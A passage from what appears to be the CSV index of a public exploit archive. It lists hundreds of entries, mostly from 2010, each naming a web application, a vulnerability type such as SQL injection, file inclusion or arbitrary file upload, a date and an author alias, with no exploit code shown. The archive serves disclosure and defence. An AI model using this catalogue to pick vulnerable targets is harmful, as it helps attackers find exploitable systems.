Inclusion",2010-05-13,eidelweiss,php,webapps, -12593,exploits/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps, -12594,exploits/php/webapps/12594.txt,"Joomla! Component com_sebercart - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps, -12595,exploits/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps, -12596,exploits/php/webapps/12596.txt,"Link Bid Script - 'links.php' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps, -12597,exploits/php/webapps/12597.txt,"Press Release Script - 'page.php?id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps, -12598,exploits/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps, -12599,exploits/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps, -14364,exploits/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps, -12601,exploits/php/webapps/12601.txt,"Joomla! Component JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps, -12606,exploits/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps, -12607,exploits/php/webapps/12607.txt,"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion",2010-05-14,ALTBTA,php,webapps, -12608,exploits/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - 'photogallery_open.php' SQL Injection",2010-05-14,CoBRa_21,php,webapps, -12609,exploits/php/webapps/12609.txt,"Alibaba Clone Platinum - '/buyer/index.php' SQL Injection",2010-05-14,GuN,php,webapps, -12610,exploits/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps, -12611,exploits/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps, -12612,exploits/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps, -12613,exploits/php/webapps/12613.txt,"CompactCMS 1.4.0 - 'tiny_mce' Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps, -12615,exploits/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps, -12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps, -12618,exploits/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps, -12619,exploits/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps, -12620,exploits/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps, -12623,exploits/php/webapps/12623.txt,"Joomla! Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,ALTBTA,php,webapps, -12624,exploits/php/webapps/12624.txt,"LinPHA 1.3.2 - 'rotate.php' Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps, -12628,exploits/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps, -12629,exploits/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps, -12630,exploits/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps, -12631,exploits/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,php,webapps, -12632,exploits/php/webapps/12632.txt,"Joomla! Component com_crowdsource - SQL Injection",2010-05-17,ByEge,php,webapps, -12633,exploits/php/webapps/12633.txt,"Joomla! Component com_event - Multiple Vulnerabilities",2010-05-17,ALTBTA,php,webapps, -12634,exploits/php/webapps/12634.txt,"PHP Gamepage - SQL Injection",2010-05-17,v4lc0m87,php,webapps, -12635,exploits/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection",2010-05-17,Ma3sTr0-Dz,php,webapps, -12636,exploits/php/webapps/12636.txt,"MidiCart PHP/ASP - Arbitrary File Upload",2010-05-17,DigitALL,php,webapps, -12637,exploits/php/webapps/12637.txt,"MyNews CMS 1.0 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2010-05-17,mr_me,php,webapps, -12639,exploits/php/webapps/12639.txt,"Joomla! Component com_event - SQL Injection",2010-05-17,anonymous,php,webapps, -12640,exploits/windows/webapps/12640.txt,"Abyss Web Server X1 - Cross-Site Request Forgery",2010-05-17,"John Leitch",windows,webapps, -12641,exploits/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,php,webapps, -12642,exploits/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path",2010-05-18,cp77fk4r,php,webapps, -12643,exploits/php/webapps/12643.pl,"ChillyCMS - Blind SQL Injection",2010-05-18,IHTeam,php,webapps, -12644,exploits/php/webapps/12644.txt,"WebJaxe - SQL Injection",2010-05-18,IHTeam,php,webapps, -12645,exploits/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps, -12646,exploits/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld & h00die",php,webapps, -12647,exploits/php/webapps/12647.txt,"Webloader 7 < 8 - 'vid' SQL Injection",2010-05-18,ByEge,php,webapps, -12648,exploits/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps, -12651,exploits/php/webapps/12651.txt,"Lokomedia CMS - 'sukaCMS' Local File Disclosure",2010-05-18,vir0e5,php,webapps, -12654,exploits/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps, -12656,exploits/php/webapps/12656.txt,"Battle Scrypt - Arbitrary File Upload",2010-05-19,DigitALL,php,webapps, -12658,exploits/freebsd/webapps/12658.txt,"McAfee Email Gateway - Web Administration Broken Access Control",2010-05-19,"Nahuel Grisolia",freebsd,webapps, -12659,exploits/php/webapps/12659.txt,"DB[CMS] - 'section.php' SQL Injection",2010-05-19,CoBRa_21,php,webapps, -12660,exploits/hardware/webapps/12660.txt,"Palo Alto Network Vulnerability - Cross-Site Scripting",2010-05-19,"Jeromie Jackson",hardware,webapps, -12661,exploits/php/webapps/12661.txt,"DBCart - 'article.php' SQL Injection",2010-05-19,v3n0m,php,webapps, -12664,exploits/asp/webapps/12664.txt,"Renista CMS - SQL Injection",2010-05-20,"Amir Afghanian",asp,webapps, -12665,exploits/php/webapps/12665.pl,"IMEDIA - 'index.php' SQL Injection",2010-05-20,kannibal615,php,webapps, -12666,exploits/php/webapps/12666.txt,"DB[CMS] - 'article.php' SQL Injection",2010-05-20,blackraptor,php,webapps, -12667,exploits/php/webapps/12667.py,"Entry Level Content Management System (EL CMS) - SQL Injection",2010-05-20,vir0e5,php,webapps, -12671,exploits/php/webapps/12671.txt,"Powder Blue Design - SQL Injection",2010-05-20,cyberlog,php,webapps, -12672,exploits/asp/webapps/12672.txt,"Spaw Editor 1.0/2.0 - Arbitrary File Upload",2010-05-20,Ma3sTr0-Dz,asp,webapps, -12674,exploits/php/webapps/12674.txt,"webYourPhotos 6.05 - 'index.php' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps, -14341,exploits/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps, -12676,exploits/php/webapps/12676.txt,"Open-AudIT - Multiple Vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps, -28046,exploits/php/webapps/28046.txt,"dotWidget for articles 2.0 - '/admin/editconfig.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps, -28047,exploits/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusions",2006-06-17,"M.Hasran Addahroni",php,webapps, -28048,exploits/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,php,webapps, -28128,exploits/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,php,webapps,80 -12679,exploits/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated Traversal File Retrieval",2010-05-21,"Richard Brain",windows,webapps, -12680,exploits/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps, -12684,exploits/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps, -12686,exploits/php/webapps/12686.txt,"Online University - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps, -12688,exploits/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps, -12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps, -12690,exploits/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps, -12691,exploits/php/webapps/12691.txt,"Online Job Board - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps, -14322,exploits/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps, -12692,exploits/php/webapps/12692.txt,"WordPress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps, -12693,exploits/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps, -12694,exploits/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote s",2010-05-22,cyberlog,php,webapps, -12695,exploits/php/webapps/12695.txt,"Azimut Technologie - Admin Authentication Bypass",2010-05-22,Ra3cH,php,webapps, -12696,exploits/php/webapps/12696.txt,"E-Commerce Group - 'cat.php' SQL Injection",2010-05-22,"BLack Revenge",php,webapps, -12697,exploits/php/webapps/12697.php,"hustoj - 'FCKeditor' Arbitrary File Upload",2010-05-22,eidelweiss,php,webapps, -12699,exploits/php/webapps/12699.txt,"eWebEditor 1.x - 'WYSIWYG' Arbitrary File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps, -12700,exploits/asp/webapps/12700.txt,"DotNetNuke - Arbitrary File Upload",2010-05-22,"Ra3cH & Ma3sTr0-Dz",asp,webapps, -12701,exploits/asp/webapps/12701.txt,"Rave Creations/UHM - 'artists.asp' SQL Injection",2010-05-22,Ra3cH,asp,webapps, -12702,exploits/php/webapps/12702.php,"ECShop - 'search.php' SQL Injection",2010-05-22,Jannock,php,webapps, -12703,exploits/php/webapps/12703.txt,"Recipes Website 1.0 - SQL Injection",2010-05-22,Mr.ThieF,php,webapps, -12706,exploits/php/webapps/12706.txt,"MMA Creative Design - SQL Injection",2010-05-23,XroGuE,php,webapps, -12707,exploits/php/webapps/12707.txt,"runt-communications Design - SQL Injection",2010-05-23,XroGuE,php,webapps, -12709,exploits/php/webapps/12709.txt,"webperformance eCommerce - SQL Injection",2010-05-23,cyberlog,php,webapps, -12711,exploits/php/webapps/12711.txt,"BBMedia Design's - SQL Injection",2010-05-23,XroGuE,php,webapps, -12712,exploits/php/webapps/12712.txt,"goffgrafix Design's - SQL Injection",2010-05-23,XroGuE,php,webapps, -12713,exploits/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,php,webapps, -12714,exploits/php/webapps/12714.txt,"infoware - SQL Injection",2010-05-24,cyberlog,php,webapps, -12715,exploits/multiple/webapps/12715.pl,"e107 - Code Exection",2010-05-24,McFly,multiple,webapps, -12716,exploits/php/webapps/12716.txt,"runt-communications Design - 'property_more.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps, -12717,exploits/php/webapps/12717.txt,"Telia Web Design - 'index.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps, -12718,exploits/php/webapps/12718.txt,"BBMedia Design's - 'news_more.php' SQL Injection",2010-05-24,gendenk,php,webapps, -12719,exploits/php/webapps/12719.txt,"PHP Graphy 0.9.7 - 'index.php' Remote Command Execution",2010-05-24,"Sn!pEr.S!Te Hacker",php,webapps, -12720,exploits/php/webapps/12720.txt,"Schaf-CMS 1.0 - SQL Injection",2010-05-24,Manas58,php,webapps, -12721,exploits/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,php,webapps, -12722,exploits/php/webapps/12722.txt,"interuse Website Builder & design - 'index2.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps, -12723,exploits/php/webapps/12723.py,"Joomla! Component Q-Personel 1.0 - SQL Injection",2010-05-24,"Valentin Hoebel",php,webapps, -12724,exploits/php/webapps/12724.php,"WebAsys - Blind SQL Injection",2010-05-24,zsh.shell,php,webapps, -12725,exploits/php/webapps/12725.txt,"ALSCO CMS - SQL Injection",2010-05-24,PrinceofHacking,php,webapps, -12726,exploits/php/webapps/12726.txt,"REvolution 10.02 - Cross-Site Request Forgery",2010-05-24,"High-Tech Bridge SA",php,webapps, -12727,exploits/php/webapps/12727.txt,"LiSK CMS 4.4 - SQL Injection",2010-05-24,"High-Tech Bridge SA",php,webapps, -12728,exploits/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure",2010-05-24,"Praveen Darshanam",windows,webapps, -12729,exploits/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,php,webapps, -12730,exploits/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,multiple,webapps, -12731,exploits/php/webapps/12731.txt,"Webloader 8 - SQL Injection",2010-05-24,ByEge,php,webapps, -12732,exploits/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - 'popup_slideshow.php' Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps, -12734,exploits/asp/webapps/12734.txt,"Blaze Apps - Multiple Vulnerabilities",2010-05-24,AmnPardaz,asp,webapps, -12735,exploits/php/webapps/12735.txt,"Nitro Web Gallery - SQL Injection",2010-05-25,cyberlog,php,webapps, -12736,exploits/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps, -12737,exploits/php/webapps/12737.txt,"Simpel Side - 'index2.php' SQL Injection",2010-05-25,MN9,php,webapps, -12743,exploits/php/webapps/12743.txt,"web5000 - 'page_show' SQL Injection",2010-05-25,"BLack Revenge",php,webapps, -12744,exploits/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,php,webapps, -12746,exploits/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps, -12748,exploits/php/webapps/12748.txt,"Multi Vendor Mall - 'pages.php' SQL Injection",2010-05-26,Newbie_Campuz,php,webapps, -12749,exploits/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,php,webapps, -12750,exploits/windows/webapps/12750.txt,"RapidWareX 2.0.1 - 'WebUI' Cross-Site Request Forgery",2010-05-26,l3D,windows,webapps, -12754,exploits/php/webapps/12754.html,"Easy Address book WebServer 1.2 - Cross-Site Request Forgery",2010-05-26,Markot,php,webapps, -12755,exploits/php/webapps/12755.txt,"Multi Vendor Mall - 'itemdetail.php?& shop.php' SQL Injection",2010-05-26,CoBRa_21,php,webapps, -12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,php,webapps, -12761,exploits/php/webapps/12761.txt,"GlobalWebTek Design - SQL Injection",2010-05-27,cyberlog,php,webapps, -12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,php,webapps, -12766,exploits/php/webapps/12766.txt,"PPhlogger 2.2.5 - 'trace.php' Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps, -12767,exploits/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,php,webapps, -12768,exploits/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps, -12769,exploits/php/webapps/12769.txt,"Joomla! Component com_mediqna 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps, -12770,exploits/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps, -12771,exploits/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,php,webapps, -12772,exploits/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,php,webapps, -12773,exploits/php/webapps/12773.txt,"Realtor Real Estate Agent - 'idproperty' SQL Injection",2010-05-28,v3n0m,php,webapps, -12776,exploits/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps, -12777,exploits/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps, -12779,exploits/php/webapps/12779.txt,"Joomla! Component My Car 1.0 - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps, -12780,exploits/php/webapps/12780.txt,"Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)",2010-05-28,Valentin,php,webapps, -12781,exploits/php/webapps/12781.txt,"Joomla! Component JE Poll - 'pollid' SQL Injection",2010-05-28,v3n0m,php,webapps, -12782,exploits/php/webapps/12782.txt,"Joomla! Component JE Job 1.0 - 'catid' SQL Injection",2010-05-28,v3n0m,php,webapps, -12785,exploits/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps, -12786,exploits/windows/webapps/12786.txt,"fusebox - 'ProductList.cfm?CatDisplay' SQL Injection",2010-05-29,Shamus,windows,webapps, -12787,exploits/php/webapps/12787.txt,"Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection",2010-05-29,AntiSecurity,php,webapps, -12788,exploits/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps, -12790,exploits/php/webapps/12790.txt,"Nucleus Plugin Twitter - Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps, -12791,exploits/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps, -12792,exploits/php/webapps/12792.txt,"MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-29,XroGuE,php,webapps, -12793,exploits/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps, -12794,exploits/php/webapps/12794.txt,"Cosmos Solutions CMS - 'id=' / 'page=' SQL Injection",2010-05-29,gendenk,php,webapps, -12796,exploits/php/webapps/12796.txt,"Joomla! Component BF Quiz 1.0 - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps, -12797,exploits/php/webapps/12797.txt,"Webiz 2004 - Local File Upload",2010-05-29,kannibal615,php,webapps, -12798,exploits/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps, -12801,exploits/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps, -12805,exploits/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps, -12806,exploits/php/webapps/12806.txt,"CMScout - Cross-Site Scripting / HTML Injection",2010-05-30,XroGuE,php,webapps, -12807,exploits/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps, -12808,exploits/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,php,webapps, -12809,exploits/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps, -12811,exploits/php/webapps/12811.txt,"osCommerce Online Merchant 2.2 - Arbitrary File Upload",2010-05-30,MasterGipy,php,webapps, -12812,exploits/php/webapps/12812.txt,"Joomla! Component com_quran - SQL Injection",2010-05-30,r3m1ck,php,webapps, -12813,exploits/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps, -12814,exploits/php/webapps/12814.txt,"Joomla! Component com_g2bridge - Local File Inclusion",2010-05-31,akatsuchi,php,webapps, -12817,exploits/php/webapps/12817.txt,"QuickTalk 1.2 - Source Code Disclosure",2010-05-31,indoushka,php,webapps, -12818,exploits/php/webapps/12818.txt,"e107 0.7.21 full - Remote File Inclusion / Cross-Site Scripting",2010-05-31,indoushka,php,webapps, -12819,exploits/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps, -12820,exploits/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,php,webapps, -12822,exploits/php/webapps/12822.txt,"Joomla! Component JS Jobs 1.0.5.8 - SQL Injection",2010-05-31,d0lc3,php,webapps, -12823,exploits/php/webapps/12823.txt,"MusicBox - SQL Injection",2010-05-31,titanichacker,php,webapps, -12833,exploits/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps, -12839,exploits/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps, -12840,exploits/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX & Cr3W-DZ",php,webapps, -12841,exploits/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,asp,webapps, -12842,exploits/php/webapps/12842.txt,"Joomla! Component ChronoConnectivity - Blind SQL Injection",2010-06-02,_mlk_,php,webapps, -12843,exploits/php/webapps/12843.txt,"Joomla! Component ChronoForms - Blind SQL Injection",2010-06-02,_mlk_,php,webapps, -12845,exploits/php/webapps/12845.txt,"Vastal I-Tech - SQL Injection",2010-06-02,HELLBOY,php,webapps, -12848,exploits/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,php,webapps, -12849,exploits/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps, -12850,exploits/php/webapps/12850.txt,"Member ID The Fish Index PHP - SQL Injection",2010-06-03,v4lc0m87,php,webapps, -12855,exploits/php/webapps/12855.txt,"phpBazar 2.1.1 stable - Remote File Inclusion",2010-06-03,Sid3^effects,php,webapps, -12856,exploits/php/webapps/12856.txt,"osCSS 1.2.1 - Arbitrary File Upload",2010-06-03,indoushka,php,webapps, -12857,exploits/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities",2010-06-03,indoushka,php,webapps, -12858,exploits/php/webapps/12858.txt,"Article Management System 2.1.2 - Reinstall",2010-06-03,indoushka,php,webapps, -12859,exploits/php/webapps/12859.txt,"Advneced Management For Services Sites - File Disclosure",2010-06-03,indoushka,php,webapps, -12861,exploits/php/webapps/12861.txt,"PHP SETI@home Web monitor - 'PHPsetimon' Local/Remote File Inclusion",2010-06-03,eidelweiss,php,webapps, -12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps, -12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps, -12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps, -30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps, -18593,exploits/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps, -18594,exploits/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps, -14247,exploits/php/webapps/14247.txt,"Auction_Software Script - Admin Authentication Bypass",2010-07-06,ALTBTA,php,webapps, -13736,exploits/php/webapps/13736.txt,"DDLCMS 2.1 - 'skin' Remote File Inclusion",2010-06-06,eidelweiss,php,webapps, -13737,exploits/php/webapps/13737.txt,"Joomla! Component DJ-ArtGallery 0.9.1 - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps, -13738,exploits/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps, -13739,exploits/php/webapps/13739.txt,"WmsCMS - Cross-Site Scripting / SQL Injection",2010-06-06,Ariko-Security,php,webapps, -13740,exploits/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps, -13741,exploits/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection",2010-06-06,Sid3^effects,php,webapps, -13744,exploits/php/webapps/13744.txt,"RTRandomImage - Remote File Inclusion",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps, -13745,exploits/php/webapps/13745.txt,"Sphider Script - Remote Code Execution",2010-06-06,XroGuE,php,webapps, -13746,exploits/php/webapps/13746.txt,"Joomla! Component Search Log 3.1.0 - SQL Injection",2010-06-06,d0lc3,php,webapps, -13747,exploits/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,php,webapps, -13748,exploits/php/webapps/13748.txt,"Joomla! Component com_annonces - Arbitrary File Upload",2010-06-06,Sid3^effects,php,webapps, -13749,exploits/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQL Injection",2010-06-06,Sid3^effects,php,webapps, -13750,exploits/php/webapps/13750.txt,"WebBiblio Subject Gateway System - Local File Inclusion",2010-06-06,AntiSecurity,php,webapps, -13751,exploits/php/webapps/13751.txt,"greeting card - Arbitrary File Upload",2010-06-06,Mr.Benladen,php,webapps, -13752,exploits/php/webapps/13752.txt,"ReVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps, -13754,exploits/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps, -13762,exploits/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps, -13766,exploits/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps, -13769,exploits/php/webapps/13769.txt,"CafeEngine 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps, -13770,exploits/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps, -13771,exploits/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps, -13772,exploits/php/webapps/13772.txt,"Rayzz Photoz - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps, -13773,exploits/php/webapps/13773.txt,"Holiday Travel Portal - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps, -13776,exploits/php/webapps/13776.txt,"Phreebooks 2.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-06-08,"Gustavo Sorondo",php,webapps, -13777,exploits/php/webapps/13777.txt,"Phreebooks 2.0 - Local File Inclusion",2010-06-08,"Gustavo Sorondo",php,webapps, -13778,exploits/php/webapps/13778.txt,"Phreebooks 2.0 - Directory Traversal",2010-06-08,"Gustavo Sorondo",php,webapps, -13779,exploits/php/webapps/13779.txt,"Pre Web Host - SQL Injection",2010-06-08,Mr.Benladen,php,webapps, -13781,exploits/php/webapps/13781.txt,"phpList 2.8.11 - SQL Injection",2010-06-08,d3v1l,php,webapps, -13782,exploits/php/webapps/13782.txt,"Image Store - Arbitrary File Upload",2010-06-08,Mr.FireStormm,php,webapps, -13783,exploits/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps, -13784,exploits/php/webapps/13784.txt,"HauntmAx CMS Haunted House - Directory Listing / SQL Injection",2010-06-09,Sid3^effects,php,webapps, -13785,exploits/php/webapps/13785.txt,"eLms Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps, -13786,exploits/php/webapps/13786.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (1)",2010-06-09,Sid3^effects,php,webapps, -13788,exploits/asp/webapps/13788.txt,"Web Wiz Forums 9.68 - SQL Injection",2010-06-09,Sid3^effects,asp,webapps, -13789,exploits/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQL Injection",2010-06-09,Sid3^effects,asp,webapps, -14294,exploits/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,php,webapps, -13790,exploits/asp/webapps/13790.txt,"iClone - SQL 